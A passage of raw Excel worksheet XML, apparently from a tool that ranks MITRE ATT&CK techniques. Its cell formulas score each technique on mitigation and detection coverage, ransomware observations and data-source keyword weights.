        <v>0.14285714285714285</v>
      </c>
      <c r="AT97" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU9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98" spans="1:47" ht="32.1">
      <c r="A98" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2506482003333332E-2</v>
      </c>
      <c r="B98" s="25">
        <f>SUM(H98,M98,V98)*(1+SUM(AE98,AG98,AI98,AK98,AM98))</f>
        <v>0.42506482003333335</v>
      </c>
      <c r="C98" s="25" t="s">
        <v>473</v>
      </c>
      <c r="D98" s="25" t="s">
        <v>474</v>
      </c>
      <c r="E98" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F98" s="51">
        <v>1</v>
      </c>
      <c r="G98" s="51">
        <v>1</v>
      </c>
      <c r="H98" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I98">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J98">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K98">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L98">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M98" s="44">
        <v>5.4998999999999998E-4</v>
      </c>
      <c r="N98" s="51">
        <v>0</v>
      </c>
      <c r="O98" s="51">
        <v>0</v>
      </c>
      <c r="P98" s="51">
        <v>0</v>
      </c>
      <c r="Q98" s="51">
        <v>0</v>
      </c>
      <c r="R98" s="52" t="s">
        <v>475</v>
      </c>
      <c r="S98" s="51">
        <v>8</v>
      </c>
      <c r="T98" s="51" t="s">
        <v>476</v>
      </c>
      <c r="U98" s="51">
        <v>15</v>
      </c>
      <c r="V98" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761905</v>
      </c>
      <c r="W98">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X98">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y98">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z98">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA98">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB98">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC98" s="29" t="s">
        <v>477</v>
      </c>
      <c r="AD98" s="25" t="str" cm="1">
        <f t="array" ref="AD98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC98)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE98" s="25">
        <f>IF(AD98="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF98" s="25" t="str" cm="1">
        <f t="array" ref="AF98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG98" s="25">
        <f>IF(AF98="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH98" s="25" t="str" cm="1">
        <f t="array" ref="AH98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC98)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI98" s="25">
        <f>IF(AH98="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ98" s="25" t="str" cm="1">
        <f t="array" ref="AJ98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK98" s="25">
        <f>IF(AJ98="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL98" s="25" t="str" cm="1">
        <f t="array" ref="AL98">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC98)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM98" s="25">
        <f>IF(AL98="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN98" s="60">
        <v>0</v>
      </c>
      <c r="AO98" s="51">
        <v>0</v>
      </c>
      <c r="AP98" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2506482003333332E-2</v>
      </c>
      <c r="AQ98" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14168827334444445</v>
      </c>
      <c r="AR98" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14168827334444445</v>
      </c>
      <c r="AS98" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT98" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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99" spans="1:47" ht="80.099999999999994">
      <c r="A99" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2813965678857145E-2</v>
      </c>
      <c r="B99" s="25">
        <f>SUM(H99,M99,V99)*(1+SUM(AE99,AG99,AI99,AK99,AM99))</f>
        <v>0.32813965678857143</v>
      </c>
      <c r="C99" s="25" t="s">
        <v>478</v>
      </c>
      <c r="D99" s="25" t="s">
        <v>479</v>
      </c>
      <c r="E99" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F99" s="51">
        <v>1</v>
      </c>
      <c r="G99" s="51">
        <v>1</v>
      </c>
      <c r="H99" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I99">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J99">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K99">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L99">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M99" s="44">
        <v>4.6537E-4</v>
      </c>
      <c r="N99" s="51">
        <v>2</v>
      </c>
      <c r="O99" s="51">
        <v>11</v>
      </c>
      <c r="P99" s="51">
        <v>4</v>
      </c>
      <c r="Q99" s="51">
        <v>7</v>
      </c>
      <c r="R99" s="51"/>
      <c r="S99" s="51">
        <v>0</v>
      </c>
      <c r="T99" s="51"/>
      <c r="U99" s="51">
        <v>0</v>
      </c>
      <c r="V99" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571427</v>
      </c>
      <c r="W99">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X99">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y99">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z99">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>24</v>
      </c>
      <c r="AA99">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.24</v>
      </c>
      <c r="AB99">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.24</v>
      </c>
      <c r="AC99" s="29" t="s">
        <v>480</v>
      </c>
      <c r="AD99" s="25" t="str" cm="1">
        <f t="array" ref="AD99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC99)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE99" s="25">
        <f>IF(AD99="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF99" s="25" t="str" cm="1">
        <f t="array" ref="AF99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG99" s="25">
        <f>IF(AF99="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH99" s="25" t="str" cm="1">
        <f t="array" ref="AH99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC99)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI99" s="25">
        <f>IF(AH99="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ99" s="25" t="str" cm="1">
        <f t="array" ref="AJ99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC99)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK99" s="25">
        <f>IF(AJ99="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL99" s="25" t="str" cm="1">
        <f t="array" ref="AL99">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC99)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM99" s="25">
        <f>IF(AL99="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN99" s="58">
        <v>0</v>
      </c>
      <c r="AO99" s="51">
        <v>0</v>
      </c>
      <c r="AP99" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2813965678857145E-2</v>
      </c>
      <c r="AQ99" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10937988559619048</v>
      </c>
      <c r="AR99" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10937988559619048</v>
      </c>
      <c r="AS99" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT99" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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00" spans="1:47" ht="32.1">
      <c r="A100" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13236120128000001</v>
      </c>
      <c r="B100" s="25">
        <f>SUM(H100,M100,V100)*(1+SUM(AE100,AG100,AI100,AK100,AM100))</f>
        <v>0.32361201280000002</v>
      </c>
      <c r="C100" s="25" t="s">
        <v>481</v>
      </c>
      <c r="D100" s="25" t="s">
        <v>482</v>
      </c>
      <c r="E100" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F100" s="51">
        <v>2</v>
      </c>
      <c r="G100" s="51">
        <v>0</v>
      </c>
      <c r="H100" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I100">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J100">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K100">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L100">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M100" s="44">
        <v>4.6015999999999999E-4</v>
      </c>
      <c r="N100" s="51">
        <v>0</v>
      </c>
      <c r="O100" s="51">
        <v>3</v>
      </c>
      <c r="P100" s="51">
        <v>1</v>
      </c>
      <c r="Q100" s="51">
        <v>0</v>
      </c>
      <c r="R100" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S100" s="51">
        <v>2</v>
      </c>
      <c r="T100" s="52" t="s">
        <v>483</v>
      </c>
      <c r="U100" s="51">
        <v>11</v>
      </c>
      <c r="V100" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W100">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X100">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y100">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z100">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA100">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB100">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC100" s="29" t="s">
        <v>484</v>
      </c>
      <c r="AD100" s="25" t="str" cm="1">
        <f t="array" ref="AD100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC100)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE100" s="25">
        <f>IF(AD100="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF100" s="25" t="str" cm="1">
        <f t="array" ref="AF100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG100" s="25">
        <f>IF(AF100="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH100" s="25" t="str" cm="1">
        <f t="array" ref="AH100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC100)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI100" s="25">
        <f>IF(AH100="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ100" s="25" t="str" cm="1">
        <f t="array" ref="AJ100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK100" s="25">
        <f>IF(AJ100="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL100" s="25" t="str" cm="1">
        <f t="array" ref="AL100">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC100)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM100" s="25">
        <f>IF(AL100="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN100" s="60">
        <v>3</v>
      </c>
      <c r="AO100" s="51">
        <v>1</v>
      </c>
      <c r="AP100" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13236120128000001</v>
      </c>
      <c r="AQ100" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10787067093333334</v>
      </c>
      <c r="AR100" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10787067093333334</v>
      </c>
      <c r="AS100" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT100" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU10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01" spans="1:47" ht="32.1">
      <c r="A101" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11792272128333334</v>
      </c>
      <c r="B101" s="25">
        <f>SUM(H101,M101,V101)*(1+SUM(AE101,AG101,AI101,AK101,AM101))</f>
        <v>0.84589387950000006</v>
      </c>
      <c r="C101" s="25" t="s">
        <v>485</v>
      </c>
      <c r="D101" s="25" t="s">
        <v>486</v>
      </c>
      <c r="E101" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F101" s="51">
        <v>4</v>
      </c>
      <c r="G101" s="51">
        <v>1</v>
      </c>
      <c r="H101" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I101">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J101">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K101">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L101">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M101" s="44">
        <v>2.9615000000000002E-4</v>
      </c>
      <c r="N101" s="51">
        <v>0</v>
      </c>
      <c r="O101" s="51">
        <v>8</v>
      </c>
      <c r="P101" s="51">
        <v>7</v>
      </c>
      <c r="Q101" s="51">
        <v>0</v>
      </c>
      <c r="R101" s="52" t="s">
        <v>487</v>
      </c>
      <c r="S101" s="51">
        <v>18</v>
      </c>
      <c r="T101" s="51" t="s">
        <v>488</v>
      </c>
      <c r="U101" s="51">
        <v>15</v>
      </c>
      <c r="V101" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.38571428571428568</v>
      </c>
      <c r="W101">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X101">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y101">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z101">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA101">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB101">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC101" s="29" t="s">
        <v>424</v>
      </c>
      <c r="AD101" s="25" t="str" cm="1">
        <f t="array" ref="AD101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC101)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE101" s="25">
        <f>IF(AD101="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF101" s="25" t="str" cm="1">
        <f t="array" ref="AF101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG101" s="25">
        <f>IF(AF101="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH101" s="25" t="str" cm="1">
        <f t="array" ref="AH101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC101)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI101" s="25">
        <f>IF(AH101="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ101" s="25" t="str" cm="1">
        <f t="array" ref="AJ101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK101" s="25">
        <f>IF(AJ101="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL101" s="25" t="str" cm="1">
        <f t="array" ref="AL101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM101" s="25">
        <f>IF(AL101="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN101" s="60">
        <v>1</v>
      </c>
      <c r="AO101" s="51">
        <v>1</v>
      </c>
      <c r="AP101" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11792272128333334</v>
      </c>
      <c r="AQ101" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.28196462650000004</v>
      </c>
      <c r="AR101" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.28196462650000004</v>
      </c>
      <c r="AS101" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT101" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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02" spans="1:47" ht="32.1">
      <c r="A102" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.7239288293809517E-2</v>
      </c>
      <c r="B102" s="25">
        <f>SUM(H102,M102,V102)*(1+SUM(AE102,AG102,AI102,AK102,AM102))</f>
        <v>0.20572621627142856</v>
      </c>
      <c r="C102" s="25" t="s">
        <v>489</v>
      </c>
      <c r="D102" s="25" t="s">
        <v>490</v>
      </c>
      <c r="E102" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F102" s="51">
        <v>1</v>
      </c>
      <c r="G102" s="51">
        <v>1</v>
      </c>
      <c r="H102" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I102">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J102">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K102">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L102">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M102" s="44">
        <v>2.9615000000000002E-4</v>
      </c>
      <c r="N102" s="51">
        <v>0</v>
      </c>
